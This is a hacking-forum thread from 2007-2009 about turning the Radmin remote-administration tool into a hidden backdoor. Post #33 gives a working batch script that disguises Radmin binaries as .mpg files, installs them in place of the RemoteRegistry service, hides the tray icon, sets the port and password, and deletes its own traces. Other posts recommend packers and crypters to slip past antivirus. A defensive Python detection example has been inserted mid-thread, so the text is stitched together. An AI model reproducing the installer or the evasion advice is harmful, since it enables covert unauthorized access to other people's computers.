Government Security
Network Security Resources

Remote Desktop Rootkits


This topic is locked. 37 replies to this topic.

#31 Marts McFly (Second Lieutenant, 591 posts)

Posted 29 April 2007 - 07:01 PM

> Well ... nice rootkit ... really useful! But there is a problem ...
>
> AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
> AntiVir 7.4.0.15 04.28.2007 no virus found
> Authentium 4.93.8 04.27.2007 no virus found
> Avast 4.7.981.0 04.26.2007 no virus found
> AVG 7.5.0.464 04.26.2007 Potentially harmful program RemoteAdmin.O
> BitDefender 7.2 04.28.2007 no virus found
> CAT-QuickHeal 9.00 04.27.2007 no virus found
> ClamAV devel-20070416 04.28.2007 no virus found
> DrWeb 4.33 04.28.2007 no virus found
> eSafe 7.0.15.0 04.27.2007 no virus found
> eTrust-Vet 30.7.3601 04.27.2007 no virus found
> Ewido 4.0 04.27.2007 no virus found
> FileAdvisor 1 04.28.2007 no virus found
> Fortinet 2.85.0.0 04.28.2007 RAT/RAdmin
> F-Prot 4.3.2.48 04.27.2007 W32/RemoteAdmin.A
> F-Secure 6.70.13030.0 04.28.2007 Backdoor.Win32.RA-based.z
> Ikarus T3.1.1.5 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
> Kaspersky 4.0.2.24 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
> McAfee 5019 04.27.2007 potentially unwanted program RemAdm-RemoteAdmin
> Microsoft 1.2405 04.28.2007 RemoteAccess:Win32/RServer (threat-c)
> NOD32v2 2225 04.27.2007 Win32/RemoteAdmin
> Norman 5.80.02 04.27.2007 no virus found
> Panda 9.0.0.4 04.28.2007 no virus found
> Prevx1 V2 04.28.2007 no virus found
> Sophos 4.16.0 04.23.2007 RemoteAdmin
> Sunbelt 2.2.907.0 04.19.2007 no virus found
> Symantec 10 04.28.2007 Remacc.Radmin
> TheHacker 6.1.6.095 04.15.2007 no virus found
> VBA32 3.11.4 04.28.2007 Backdoor.Win32.RA-based.v#1
> VirusBuster 4.3.7:9 04.27.2007 Backdoor.Radmin.Y
> Webwasher-Gateway 6.0.1 04.28.2007 Riskware.RemoteAdmin.R
>
> Maybe, if you want, you can make an Access Remote PC rootkit :D

What do you expect? He posted this almost 2 years ago! I'm surprised more AVs didn't pick it up.
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#32 loloko (Private, Members, 11 posts)

Posted 30 April 2007 - 07:27 AM

>> Well ... nice rootkit ... really useful! But there is a problem ...
>>
>> [scan results identical to those quoted in post #31]
>>
>> Maybe, if you want, you can make an Access Remote PC rootkit :D
>
> What do you expect? He posted this almost 2 years ago! I'm surprised more AVs didn't pick it up.

Hello,

Radmin is regular software, so none of the AV companies classify this tool as a "wild" backdoor.

#33 dkollf (Private, Members, 2 posts)

Posted 16 June 2007 - 09:07 AM

See my .bat file

---------------------------------------------------------------
@echo off
net stop r_server
net stop radmm
net stop PlugPlayExt
net stop RemoteRegistry
copy 1.mpg %windir%\System32\regsvcs.exe
copy 2.mpg %windir%\System32\raddrv.dll
copy 3.mpg %windir%\System32\AdmDll.dll
copy 4.mpg %windir%\System32\serv.exe
copy 5.mpg %windir%\System32\dtreg.exe
serv remove RemoteRegistry /y
serv.exe install RemoteRegistry /b:"%windir%\system32\regsvcs.exe /service" /n:"Remote Registry Service" /i:yes /u:LocalSystem /s:auto
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01\ViewType
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SOFTWARE\RAdmin\v1.01\ViewType\Data=01f699b0575c1380186ff3fc68838ebfca4a9c5eccf98e7c3172ae28315e990b9fa48961fc0ce34750e30608f0552b80b3d4c0a8153627f05f8ef7b0f5b04bdb
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=35e40000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=1da3829a0bab2b4b1bd98142aa93136a
dtreg.exe -Quiet -Set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
dtreg.exe -Quiet -Set REG_SZ \HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry\Description=Allow Remote Registry Control
echo Registry settings changed...
echo Starting Radmin Service now
net start RemoteRegistry
del %windir%\System32\*.mpg
del %windir%\System32\*.bat
---------------------------------------------------------------
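From the defender's side, the batch file above leaves two plain artifacts on a host: the RemoteRegistry service no longer runs under svchost.exe, and Radmin's own parameters appear under HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters, with the listening port stored as a little-endian REG_BINARY DWORD. The Python checker below is an added example, not code from this thread; it takes an ImagePath string and a .reg-style export (both constructed samples here, so it runs offline) and assumes the legitimate ImagePath contains `svchost.exe -k localService`.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input (not captured from a real host): the ImagePath the
# batch file registers for RemoteRegistry, plus a .reg-style export of the
# Radmin values it writes.
SAMPLE_IMAGE_PATH = r'C:\WINDOWS\system32\regsvcs.exe /service'
SAMPLE_REG_EXPORT = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:35,e4,00,00
'''

# Assumption: genuine RemoteRegistry is hosted by svchost.exe in the
# localService group; any other host binary deserves a closer look.
EXPECTED_HOST = re.compile(r'svchost\.exe\s+-k\s+localservice', re.IGNORECASE)

def image_path_is_suspicious(image_path: str) -> bool:
    """True when RemoteRegistry's ImagePath does not point at svchost.exe."""
    return EXPECTED_HOST.search(image_path) is None

def parse_reg_export(text: str) -> Dict[Tuple[str, str], bytes]:
    """Parse the .reg subset used here: [key] headers and "name"=hex:.. values."""
    values: Dict[Tuple[str, str], bytes] = {}
    key: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
        elif key is not None and '=hex:' in line:
            name, raw = line.split('=hex:', 1)
            values[(key, name.strip('"'))] = bytes.fromhex(raw.replace(',', ''))
    return values

def radmin_port(values: Dict[Tuple[str, str], bytes]) -> Optional[int]:
    """Decode the little-endian DWORD Radmin stores in Server\\Parameters\\Port."""
    for (key, name), data in values.items():
        if key.upper().endswith(r'\RADMIN\V2.0\SERVER\PARAMETERS') and name == 'Port':
            return int.from_bytes(data[:4], 'little')
    return None

def assess(image_path: str, reg_export: str) -> List[str]:
    """Return findings for a host; an empty list means nothing was flagged."""
    findings = []
    if image_path_is_suspicious(image_path):
        findings.append(f'RemoteRegistry ImagePath is not svchost.exe: {image_path}')
    port = radmin_port(parse_reg_export(reg_export))
    if port is not None:
        findings.append(f'Radmin server parameters present; configured port {port}')
    return findings
```

On the sample input the port decodes to 58421, not Radmin's well-known default, which is exactly why checking the registry value rather than scanning for a fixed port is worthwhile.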

#34 xaiver (Private, Members, 8 posts)

Posted 06 June 2009 - 12:16 AM

Is there anybody who can upload a modded Radmin, where you only have to start a bat file and then it installs, and you can then connect by Radmin Viewer? I'm looking for that.

#35 squirl (Private First Class, Members, 64 posts)

Posted 06 June 2009 - 05:22 AM

OMG, read the first post... you got everything there...
Read it and you can do it by yourself.

#36 AdmiralB (Specialist, Sergeant Major, 338 posts)

Posted 06 June 2009 - 08:05 PM

Well, regarding virus scans,

you can try to mask the rootkits with different packers, crypters and morphing apps.

#37 GhostShell (Staff Sergeant, Members, 345 posts)

Posted 08 June 2009 - 07:37 AM

> Well, regarding virus scans,
>
> you can try to mask the rootkits with different packers, crypters and morphing apps.

Not only can you do that, but Radmin is very easy to modify; I modded everything in mine, and it never gets removed or caught, ever. The RemoteRegistry mod batch file pasted above made me laugh. I use similar tricks, but what a lame service to choose. What admin would not stop that?
http://pcsubject.com/ <- My new Blog

"As a young boy, I was taught in high school that hacking was cool." -Kevin Mitnick

"It's easy to point and click programs, but that's not real hacking." -illwill

#38 Ryan M (First Sergeant, Second Lieutenant, 1,740 posts)

Posted 08 June 2009 - 07:31 PM

Do not bump old topics. Closed.
There is no security on this earth. Only opportunity.
-Douglas MacArthur

GSO Compiled Exploit Database
----------------------------------------
Mod at GovernmentSecurity
